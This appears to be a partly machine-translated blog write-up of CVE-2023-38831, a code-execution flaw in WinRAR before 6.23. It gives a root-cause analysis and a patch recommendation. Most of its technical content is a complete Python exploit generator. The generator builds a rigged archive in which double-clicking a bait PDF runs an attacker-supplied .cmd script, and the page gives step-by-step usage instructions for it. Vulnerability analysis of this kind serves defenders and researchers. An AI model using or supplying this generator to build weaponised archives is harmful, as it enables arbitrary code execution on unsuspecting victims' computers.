Article directory
Preface
WinRAR is a powerful archive manager, which is the graphical interface of the archive tool RAR in the Windows environment.
This software can be used to back up data, reduce the size of email attachments, decompress RAR, ZIP and other types of files downloaded from the Internet, and create new compressed files in RAR and ZIP formats.
Starting from version 5.60, WinRAR has enabled new icons, but users can still switch back to the original style icons through the theme pack provided on the official website.
statement
Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article are the responsibility of the user himself. All adverse consequences and The author of the article is irrelevant. This article is for educational purposes only.
1. Vulnerability description
WinRAR is a file compressor that supports compression and decompression of files in RAR, ZIP and other formats. WinRAR has a code execution vulnerability when processing files and folders with the same name in the compressed package. The attacker constructs a specially crafted compressed package file composed of malicious files and non-malicious files. After inducing the victim to open this file, the attacker will execute arbitrary commands on the victim machine. code.
There is a security vulnerability in RARLabs WinRAR versions before 6.23, which allows attackers to execute arbitrary code.
2. Affected versions
- WinRAR < 6.23
3. Vulnerability analysis
Vulnerability triggering is mainly divided into two links:
1. When the bait file is clicked, the file in the folder with the same name is released.
2. When the file is executed, the .cmd file in the folder is executed instead of the original file.
release file
After the user clicks the file, winrar will traverse the direntry in the zip file, compare direntry->name and the clicked file name (click_name). The fourth parameter option of the comparison function (0047F790) is, the function will be called, option as 0x80000006the 00496020third When the parameters are passed 00496020in, click_name and entry_name will be compared as strings.
Since the comparison length passed in is the length of click_name, comparisons like "CLASSIFIED_DOCUMENTS.pdf " and "CLASSIFIED_DOCUMENTS.pdf \CLASSIFIED_DOCUMENTS.pdf .cmd " will match, so direntrywhen folder with the same name as the clicked file, the comparison function will return 1 indicates matching, and the file corresponding to the entry will be released together with the clicked file.
In the repair version 623beta, the option value passed into the comparison function is 0x80000002. Under this condition, the comparison function will first extract the directory names of the two parameters for comparison, and the above situation will no longer match.
The new version of the option value sets the flag for control. The flag is set after the temporary directory is successfully created and used during the parsing process.
file execution
Take the following utilization code part as an example. After double-clicking the pdf file in the winrar display window, winrar will use the function ShellExecuteExW to execute the file. The parameters passed here are: "C:\Users\ \AppData\Local\Temp
\ ************Rar$DIa *****.*****\CLASSIFIED_DOCUMENTS .pdf "
Due to the existence of the above bug, the following two files will be released in the temporary folder: CLASSIFIED_DOCUMENTS.pdfandCLASSIFIED_DOCUMENTS.pdf .cmd
这两个文件的末尾空格都在函数4A26B0中被去除
Since ShellExecuteExWthere is a space at the end of the parameter, it will execute the second .cmd file and the vulnerability is triggered!!!
4. Recurrence of vulnerabilities
The environment for this recurrence is as follows
Reproduction environment installation package: Click to download
the github script verification
Project address: CVE-2023-38831-winrar-exploit
The exploit code is as follows (the code components are marked)
import shutil
import os, sys
from os.path import join
TEMPLATE_NAME = "TEMPLATE"
OUTPUT_NAME = "CVE-2023-38831-poc.tar"
# 模板文件夹的名称
BAIT_NAME = "CLASSIFIED_DOCUMENTS.pdf"
#诱饵文件
SCRIPT_NAME = "script.bat"
#脚本文件
if len(sys.argv) > 3:
BAIT_NAME = os.path.basename(sys.argv[1])
SCRIPT_NAME = os.path.basename(sys.argv[2])
OUTPUT_NAME = os.path.basename(sys.argv[3])
elif len(sys.argv) == 2 and sys.argv[1] == "poc":
pass
else:
print("""Usage:
python .\cve-2023-38831-exp-gen.py poc
python .\cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
sys.exit()
# 赋值 BAIT_NAME, SCRIPT_NAME 和 OUTPUT_NAME
BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")
# 确定其扩展名,将 BAIT_NAME 按照最后一个"."进行分割,取最后一部分作为扩展名,并添加 b"." 前缀,得到 BAIT_EXT
print("BAIT_NAME:", BAIT_NAME)
print("SCRIPT_NAME:", SCRIPT_NAME)
print("OUTPUT_NAME:", OUTPUT_NAME)
if os.path.exists(TEMPLATE_NAME):
shutil.rmtree(TEMPLATE_NAME)
os.mkdir(TEMPLATE_NAME)
d = join(TEMPLATE_NAME, BAIT_NAME + "A")
if not os.path.exists(d):
os.mkdir(d)
shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))
shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))
# if os.path.exists(OUTPUT_NAME):
# print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
# sys.exit()
shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)
with open(TEMPLATE_NAME + ".zip", "rb") as f:
content = f.read()
content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")
#改诱饵文件扩展名
os.remove(TEMPLATE_NAME + ".zip")
# 删除临时zip
with open(OUTPUT_NAME, "wb") as f:
f.write(content)
#写入文件
print("ok..")
Two ways to generate POC
python cve-2023-38831-exp-gen.py poc
or
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
Instructions
1、将诱饵文件和(邪恶)脚本文件放置在当前目录下,诱饵文件建议为图片(.png、jpg)或文档(.pdf)
2、运行python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>以生成您的漏洞利用程序
Execute the command to generate exp.rar, open the compressed package and double-click to run the *****.pdf file
and finally execute Calc
5. Repair suggestions
It is recommended that those who have not updated in time should update to the latest version 6.23 as soon as possible to avoid malicious attacks.